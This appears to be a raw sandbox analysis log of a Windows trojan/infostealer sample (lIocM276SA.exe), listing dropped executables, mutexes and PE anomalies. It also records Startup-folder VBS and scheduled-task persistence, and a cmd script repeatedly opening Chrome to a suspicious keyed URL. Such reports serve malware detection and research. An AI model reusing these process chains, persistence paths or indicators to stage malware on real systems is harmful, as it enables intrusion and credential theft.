Source: unknown	HTTPS traffic detected: 172.67.133.135:443 -> 192.168.2.4:50052 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.135:443 -> 192.168.2.4:50108 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.135:443 -> 192.168.2.4:50111 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.135:443 -> 192.168.2.4:50114 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.133.135:443 -> 192.168.2.4:50115 version: TLS 1.2

Source: chrome.exe

Process created: 138

System Summary

PE file contains section with special chars

Source: lIocM276SA.exe	Static PE information: section name:
Source: lIocM276SA.exe	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: 4477947f1f.exe.6.dr	Static PE information: section name:
Source: 4477947f1f.exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: 2090621607.exe.6.dr	Static PE information: section name:
Source: 2090621607.exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: random[1].exe1.6.dr	Static PE information: section name: .rsrc
Source: random[1].exe1.6.dr	Static PE information: section name: .idata
Source: random[1].exe1.6.dr	Static PE information: section name:
Source: 0717674af5.exe.6.dr	Static PE information: section name:
Source: 0717674af5.exe.6.dr	Static PE information: section name: .rsrc
Source: 0717674af5.exe.6.dr	Static PE information: section name: .idata
Source: 0717674af5.exe.6.dr	Static PE information: section name:

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0041CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,	6_2_0041CB97
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F747B8 NtResumeThread,	7_2_05F747B8
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F72F30 NtProtectVirtualMemory,	7_2_05F72F30
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F747B0 NtResumeThread,	7_2_05F747B0
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F72F28 NtProtectVirtualMemory,	7_2_05F72F28

Source: C:\Users\user\Desktop\lIocM276SA.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\lIocM276SA.exe	Code function: 0_2_00318860	0_2_00318860
Source: C:\Users\user\Desktop\lIocM276SA.exe	Code function: 0_2_00317049	0_2_00317049
Source: C:\Users\user\Desktop\lIocM276SA.exe	Code function: 0_2_003178BB	0_2_003178BB
Source: C:\Users\user\Desktop\lIocM276SA.exe	Code function: 0_2_003131A8	0_2_003131A8
Source: C:\Users\user\Desktop\lIocM276SA.exe	Code function: 0_2_002D4B30	0_2_002D4B30
Source: C:\Users\user\Desktop\lIocM276SA.exe	Code function: 0_2_00312D10	0_2_00312D10
Source: C:\Users\user\Desktop\lIocM276SA.exe	Code function: 0_2_002D4DE0	0_2_002D4DE0
Source: C:\Users\user\Desktop\lIocM276SA.exe	Code function: 0_2_00307F36	0_2_00307F36
Source: C:\Users\user\Desktop\lIocM276SA.exe	Code function: 0_2_0031779B	0_2_0031779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00447049	1_2_00447049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00448860	1_2_00448860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_004478BB	1_2_004478BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_004431A8	1_2_004431A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00404B30	1_2_00404B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00442D10	1_2_00442D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00404DE0	1_2_00404DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00437F36	1_2_00437F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_0044779B	1_2_0044779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00447049	2_2_00447049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00448860	2_2_00448860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_004478BB	2_2_004478BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_004431A8	2_2_004431A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00404B30	2_2_00404B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00442D10	2_2_00442D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00404DE0	2_2_00404DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00437F36	2_2_00437F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0044779B	2_2_0044779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0040E530	6_2_0040E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00426192	6_2_00426192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00448860	6_2_00448860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00404B30	6_2_00404B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00442D10	6_2_00442D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00404DE0	6_2_00404DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00420E13	6_2_00420E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00447049	6_2_00447049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_004431A8	6_2_004431A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00421602	6_2_00421602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0044779B	6_2_0044779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_004478BB	6_2_004478BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00423DF1	6_2_00423DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00437F36	6_2_00437F36
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05C71018	7_2_05C71018
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_011F18A7	7_2_011F18A7
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_011F18CD	7_2_011F18CD
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_011F18E8	7_2_011F18E8
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_011F1F88	7_2_011F1F88
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05E37540	7_2_05E37540
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05E3B528	7_2_05E3B528
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05E37531	7_2_05E37531
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05E35C60	7_2_05E35C60
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05E35C50	7_2_05E35C50
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05E379F8	7_2_05E379F8
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F53403	7_2_05F53403
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F50040	7_2_05F50040
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F56EC8	7_2_05F56EC8
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F53797	7_2_05F53797
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F5003F	7_2_05F5003F
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F50006	7_2_05F50006
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F54A78	7_2_05F54A78
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F7FA58	7_2_05F7FA58
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F707C8	7_2_05F707C8
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F72028	7_2_05F72028
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F7FA48	7_2_05F7FA48
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F89CE8	7_2_05F89CE8
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F83698	7_2_05F83698
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F8F2B8	7_2_05F8F2B8
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F89CDB	7_2_05F89CDB
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F8C0C8	7_2_05F8C0C8
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_05F8C0B8	7_2_05F8C0B8
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_06160006	7_2_06160006
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_06160040	7_2_06160040
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_061B7E29	7_2_061B7E29
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_061B7E26	7_2_061B7E26
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_061B79BA	7_2_061B79BA
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Code function: 7_2_061B79C8	7_2_061B79C8

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\pohtent2[1].exe BF7E9CF27CAC0D8EB54B86F28BF4C06507BD185BB1E3932DE1F5F86166A45778
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe BF7E9CF27CAC0D8EB54B86F28BF4C06507BD185BB1E3932DE1F5F86166A45778

Source: C:\Users\user\Desktop\lIocM276SA.exe	Code function: String function: 002E80C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0041DF80 appears 81 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0041D942 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0041D663 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0041D64E appears 79 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00417A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 004180C0 appears 393 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00438E10 appears 47 times

Source: lIocM276SA.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: pohtent2[1].exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: pohtent2.exe.6.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TypeId.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: random[1].exe1.6.dr	Static PE information: Section: mjfoaubi ZLIB complexity 0.9947398244598765
Source: 0717674af5.exe.6.dr	Static PE information: Section: mjfoaubi ZLIB complexity 0.9947398244598765

Source: skotes.exe.0.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: lIocM276SA.exe	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: 7.2.pohtent2.exe.3e8cdc0.1.raw.unpack, qZd874ssH8FbjZUkwHY.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.pohtent2.exe.3e8cdc0.1.raw.unpack, qZd874ssH8FbjZUkwHY.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.pohtent2.exe.3e8cdc0.1.raw.unpack, VlHlTsDtqT7hyjwdYx.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.pohtent2.exe.3e8cdc0.1.raw.unpack, VlHlTsDtqT7hyjwdYx.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.pohtent2.exe.3e8cdc0.1.raw.unpack, THuJdNm83ANwrdBExh.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 7.2.pohtent2.exe.61c0000.5.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.pohtent2.exe.61c0000.5.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 7.2.pohtent2.exe.61c0000.5.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 7.2.pohtent2.exe.61c0000.5.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 7.2.pohtent2.exe.61c0000.5.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 7.2.pohtent2.exe.61c0000.5.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.pohtent2.exe.61c0000.5.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 7.2.pohtent2.exe.61c0000.5.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.pohtent2.exe.61c0000.5.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.pohtent2.exe.61c0000.5.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@495/29@21/10

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\pohtent2[1].htm

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: \Sessions\1\BaseNamedObjects\b36ddd9f31
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:14224:120:WilError_03

Source: C:\Users\user\Desktop\lIocM276SA.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\lIocM276SA.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\lIocM276SA.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 2090621607.exe, 00000038.00000003.2828594585.00000000058D4000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: lIocM276SA.exe	ReversingLabs: Detection: 52%
Source: lIocM276SA.exe	Virustotal: Detection: 57%

Source: lIocM276SA.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: lIocM276SA.exe	String found in binary or memory: F><RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeVPU

Source: C:\Users\user\Desktop\lIocM276SA.exe

File read: C:\Users\user\Desktop\lIocM276SA.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\lIocM276SA.exe "C:\Users\user\Desktop\lIocM276SA.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\lIocM276SA.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe "C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe"
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\runner.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1916,i,2743930979166446243,11984125679060302953,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=1896,i,12903140965514512258,7879093714222373490,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2020,i,5642825108350335219,8833507162415557396,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1988,i,14015565629516230816,9755923701176644948,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1984,i,10036202946459383482,9416271039885435074,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1584,i,5243679326072088091,3788876514745600771,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1980,i,10283285120756280865,5244641420518172917,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1984,i,10757545353850069080,17528760924176413797,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1984,i,5668110240625218180,2372566740740461637,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1972 --field-trial-handle=1996,i,10628045244502770481,15461531275763280924,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 --field-trial-handle=1988,i,1396496370233068950,16639235529074936853,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=600 --field-trial-handle=1952,i,5853220489963610329,11725451507788123041,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
